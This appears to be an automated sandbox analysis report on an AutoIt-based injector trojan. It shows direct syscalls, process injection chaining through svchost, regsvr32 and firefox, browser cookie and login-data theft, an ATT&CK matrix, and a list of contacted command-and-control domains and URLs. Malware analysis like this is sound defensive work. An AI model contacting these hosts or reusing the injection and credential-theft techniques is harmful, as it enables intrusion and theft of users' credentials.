Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtUnmapViewOfSection: Direct from: 0x76EF2D3CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\regsvr32.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: NULL target: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: NULL target: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 2300Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeThread APC queued: target process: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 47A008Jump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
Source: C:\Users\user\Desktop\LlbpXphTu9.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\LlbpXphTu9.exe"Jump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
Source: kSsZkfadpV.exe, 00000004.00000000.2265486014.00000000011D1000.00000002.00000001.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000004.00000002.4497404569.00000000011D1000.00000002.00000001.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000000.2414439270.0000000001811000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: LlbpXphTu9.exe, kSsZkfadpV.exe, 00000004.00000000.2265486014.00000000011D1000.00000002.00000001.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000004.00000002.4497404569.00000000011D1000.00000002.00000001.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000000.2414439270.0000000001811000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: kSsZkfadpV.exe, 00000004.00000000.2265486014.00000000011D1000.00000002.00000001.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000004.00000002.4497404569.00000000011D1000.00000002.00000001.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000000.2414439270.0000000001811000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: LlbpXphTu9.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: kSsZkfadpV.exe, 00000004.00000000.2265486014.00000000011D1000.00000002.00000001.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000004.00000002.4497404569.00000000011D1000.00000002.00000001.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000000.2414439270.0000000001811000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

Stealing of Sensitive Information

barindex
Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
Source: LlbpXphTu9.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: LlbpXphTu9.exeBinary or memory string: WIN_XP
Source: LlbpXphTu9.exeBinary or memory string: WIN_XPe
Source: LlbpXphTu9.exeBinary or memory string: WIN_VISTA
Source: LlbpXphTu9.exeBinary or memory string: WIN_7
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure2
Valid Accounts
3
Native API
1
DLL Side-Loading
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
1
OS Credential Dumping
1
System Time Discovery
Remote Services1
Archive Collected Data
4
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job2
Valid Accounts
1
Abuse Elevation Control Mechanism
1
Deobfuscate/Decode Files or Information
21
Input Capture
1
Account Discovery
Remote Desktop Protocol1
Data from Local System
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares1
Email Collection
4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
Valid Accounts
3
Obfuscated Files or Information
NTDS116
System Information Discovery
Distributed Component Object Model21
Input Capture
4
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
Access Token Manipulation
1
DLL Side-Loading
LSA Secrets241
Security Software Discovery
SSH3
Clipboard Data
Fallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
Process Injection
2
Valid Accounts
Cached Domain Credentials2
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Virtualization/Sandbox Evasion
DCSync3
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540314 Sample: LlbpXphTu9.exe Startdate: 23/10/2024 Architecture: WINDOWS Score: 100 28 www.onlinesbi.xyz 2->28 30 www.nexari.xyz 2->30 32 21 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Machine Learning detection for sample 2->46 48 AI detected suspicious sample 2->48 10 LlbpXphTu9.exe 1 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 68 Contains functionality to detect sleep reduction / modifications 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 kSsZkfadpV.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 regsvr32.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 kSsZkfadpV.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rvmsensors.net 37.9.175.196, 50026, 50027, 50028 WEBSUPPORT-SRO-SK-ASSK Slovakia (SLOVAK Republic) 22->34 36 www.newhopetoday.app 216.40.34.41, 50022, 50023, 50024 TUCOWSCA Canada 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
LlbpXphTu9.exe45%ReversingLabsWin32.Trojan.AutoitInject
LlbpXphTu9.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
https://duckduckgo.com/ac/?q=0%URL Reputationsafe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
https://www.ecosia.org/newtab/0%URL Reputationsafe
https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
treatyourownhip.online
81.169.145.95
truetrue
    unknown
    ghs.google.com
    142.250.184.211
    truefalse
      unknown
      stoff-tanz.online
      84.32.84.32
      truetrue
        unknown
        www.astrext.info
        217.160.0.132
        truetrue
          unknown
          refs4refs.info
          3.33.130.190
          truetrue
            unknown
            www.rvmsensors.net
            37.9.175.196
            truetrue
              unknown
              dorabox.org
              3.33.130.190
              truetrue
                unknown
                onlinesbi.xyz
                3.33.130.190
                truetrue
                  unknown
                  www.nexari.xyz
                  162.0.211.143
                  truetrue
                    unknown
                    www.newhopetoday.app
                    216.40.34.41
                    truetrue
                      unknown
                      www.2925588.com
                      103.71.154.12
                      truetrue
                        unknown
                        starseedtechs.net
                        3.33.130.190
                        truetrue
                          unknown
                          www.lpskfz.top
                          206.238.184.168
                          truetrue
                            unknown
                            www.7wkto5nk230724z.click
                            104.21.3.193
                            truetrue
                              unknown
                              ghs.googlehosted.com
                              142.250.186.115
                              truefalse
                                unknown
                                www.femaled.info
                                unknown
                                unknownfalse
                                  unknown
                                  www.digitaladpro.shop
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.treatyourownhip.online
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.dorabox.org
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.refs4refs.info
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.stoff-tanz.online
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.onlinesbi.xyz
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.starseedtechs.net
                                              unknown
                                              unknownfalse
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.femaled.info/6lzj/false
                                                  unknown
                                                  http://www.stoff-tanz.online/nwjc/?9X=vplFMCdC7aIsqq2qzVkqAyzG+skkF31Z/0uqLHtS/QTNtUfqlnIz0Od0xQPrBdYo7KQ1sh0HCuzSB788wT4eqStiFQmkDMRSnlHxaQk0f8iMWQ6+S/UMcmd0hzm0v8bMvQ==&1BSHu=OBVxGh8PUTflSv4ptrue
                                                    unknown
                                                    http://www.newhopetoday.app/a3g8/?1BSHu=OBVxGh8PUTflSv4p&9X=rCBtjJUCi7SB2rgsrATHoblCkaEhTmMbACbG+CnZd2Ypm/CW+vOsJnZFvrxs6YcQD3M8aJdgrkwo15E7VwGofvb1NfQ6zSVSxSWpILyRw7uSQHVmZsRD5PzpuDuRbdvTXA==true
                                                      unknown
                                                      http://www.rvmsensors.net/hcwd/true
                                                        unknown
                                                        http://www.2925588.com/b5ow/?9X=8LMR5gxnI2KgXZumrwdc+cOsoyeKRmv9aI/KcgXQMu2PSseta9mr379bAQAaBpSSNlwauLzgQiXoOYlcs2hn5ZOCoHo9ZIPfMV7mBvL1YvynlbmYgkxyCyhThANftQWn+w==&1BSHu=OBVxGh8PUTflSv4ptrue
                                                          unknown
                                                          http://www.nexari.xyz/5b3f/true
                                                            unknown
                                                            http://www.stoff-tanz.online/nwjc/true
                                                              unknown
                                                              http://www.nexari.xyz/5b3f/?9X=zWqICce78KsRsb3emhnNvHvM+W3x418idXM1rAmyQjpDKOJvjXjB2SvsM5F8iWg/KY2mpJvFIaNUJt7K+YoonzlyhZp7qTKaZMaVqhKjy1MfdFS8xqYwAVxm55oG8sOrtw==&1BSHu=OBVxGh8PUTflSv4ptrue
                                                                unknown
                                                                http://www.refs4refs.info/bu27/?1BSHu=OBVxGh8PUTflSv4p&9X=arK7OIHQWHgtDh1sf3kI8J+cFmR/JkLbUgiPCIgJ4c+wocF+yDjQeqOS9t2GatOOF1cc3WLgy0tHiTOMZdFQznjBMcPan8e4q4HEgkesUNBGloCBbuoZKCUD7zaLk7kfsg==true
                                                                  unknown
                                                                  http://www.astrext.info/igvi/?9X=1Z74VMbfQx3SoauZzBTM+a//aSvcAjLme6CXEJ06hrGnbB9hlVufDNB6xfV3H9TSbDN3LR5Y30pDSwif1kmvReNxbTsCEz1yl5l5s2yLmzBxFHjNeqHXJu8pRbMXulPG1g==&1BSHu=OBVxGh8PUTflSv4ptrue
                                                                    unknown
                                                                    http://www.7wkto5nk230724z.click/smpu/?1BSHu=OBVxGh8PUTflSv4p&9X=fT9kFChMB5AarVf4uwJ4SjWrUtnRCy4SEYhs5qbUmyCbD8/bJwwHr5ZsD7KDf/ys2t/zimMcaAHu0zRNXmaWGIA1V7G/4fD2oSnkvqck/+1ElBxjD31eR7F5E9/q372Edw==true
                                                                      unknown
                                                                      http://www.lpskfz.top/msip/?9X=w6wz0tlIGVZZ0dJBzjMbYtpV0lMRXZOlwVjrIg8LHpJWNK6lQ7Aml8Id1YcpySOh8nlDQOeKPQwwWGnzCK1puGT5HSmHMN1dTi/bqzhFU0UoC7D1/VBGZ9K3GrDzBJ1/ig==&1BSHu=OBVxGh8PUTflSv4ptrue
                                                                        unknown
                                                                        http://www.rvmsensors.net/hcwd/?9X=wqsdOIwQnV+rc5xe3M17LsCEHDXbvUAt7b9v0h6Q5REfDRPnfgrmUJ/SsNAT27O4J2mBDqLSNO3xx/PwERc00aw49NjnZ10GfH1ek+9b7dOW1JjLH3u3vCxZXNj5tdujpA==&1BSHu=OBVxGh8PUTflSv4ptrue
                                                                          unknown
                                                                          http://www.femaled.info/6lzj/?9X=xAog8lu6Eu7QtFn4XzpwK636jvz7h/RiPL6Mqd+tn3LhinkNlGJ/IgptFmyDalBvSo4ysHuuqGyYnVLY/iOj/oM6bcsKlVS4THtoYGTMNZH5M+UIQXTFDbo/ztpf13hKpQ==&1BSHu=OBVxGh8PUTflSv4pfalse
                                                                            unknown
                                                                            http://www.treatyourownhip.online/k7fo/true
                                                                              unknown
                                                                              http://www.digitaladpro.shop/ggfl/false
                                                                                unknown
                                                                                http://www.astrext.info/igvi/true
                                                                                  unknown
                                                                                  http://www.onlinesbi.xyz/l11k/true
                                                                                    unknown
